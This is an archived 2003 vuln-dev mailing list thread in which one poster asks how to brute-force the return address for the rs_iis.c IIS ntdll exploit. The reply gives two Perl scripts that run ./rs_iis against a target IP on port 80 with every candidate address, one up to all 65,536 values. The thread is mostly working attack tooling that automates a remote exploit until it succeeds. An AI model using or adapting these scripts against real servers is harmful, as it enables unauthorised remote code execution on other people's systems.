Vulnerability Development mailing list archives

Re: Generating Hex Numbers to brute force rs_iis.c


From: "Maarten" <secfocus () hartsuijker com>
Date: Wed, 2 Apr 2003 18:06:00 +0200

Well, I suppose you mean something like:

#!/usr/bin/perl
use strict;
use warnings;

my $IP = $ARGV[0];
# Walk the high byte 0x00..0xff; the low byte stays fixed at 0x04.
for my $x (0 .. 255)
{
  my $y = sprintf("%02x", $x);
  print "Trying at: $IP 0x${y}04 port 20${x}\n";
  my $output = `./rs_iis $IP 80 20${x} 0x${y}04`;
  print "$output\n";
}

You can run it with "brute.pl IP"

You could run it with all possible 65536 possibilities, but that's probably
overkill.

#!/usr/bin/perl
use strict;
use warnings;

my $IP = $ARGV[0];
# Try every 16-bit value 0x0000..0xffff as the return address.
for my $x (0 .. 65535)
{
  my $y = sprintf("%04x", $x);
  my $output = `./rs_iis $IP 80 12345 0x${y}`;
  print "$output\n";
}

maarten

----- Original Message -----
From: "Jeremy Junginger" <jj () act com>
To: <vuln-dev () securityfocus com>
Sent: Monday, March 31, 2003 5:14 PM
Subject: Generating Hex Numbers to brute force rs_iis.c


Hey guys,

In playing with rs_iis.c (ntdll exploit) in our lab, I've been looking
for ways to brute force the return address.

I know there's been a shell script (rs_brute.sh) released that already
does this, but since I've been playing with PERL lately (and since this
shell script did not exist when I began playing with the exploit), I
thought I'd take a whack at producing the RET addresses (0x0000-0xffff)
in a PERL script.  I just wanted to get your input and see if there is
an easier way to do this (using PERL, of course).  Basically, the goal
is as follows:

1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern
(0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
2) pass the output to rs_iis via system() command?

So far, I can generate the output and print it to stdout.  Any tips on
getting the script to run rs_iis once with each address produced by the
script?  Also, is there a way to produce this output without creating an
array like this?

#!/usr/bin/perl -w
use strict;

# Hex digit lookup table, one entry per nibble.
my @HexD =
('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

# Print each byte value twice, giving 0000, 0101, ... ffff.
for (my $i = 0; $i <= 255; $i += 1) {
        my $byte = $HexD[int($i / 16)] . $HexD[$i % 16];
        print "$byte$byte\n";
}

Many thanks,

-Jeremy
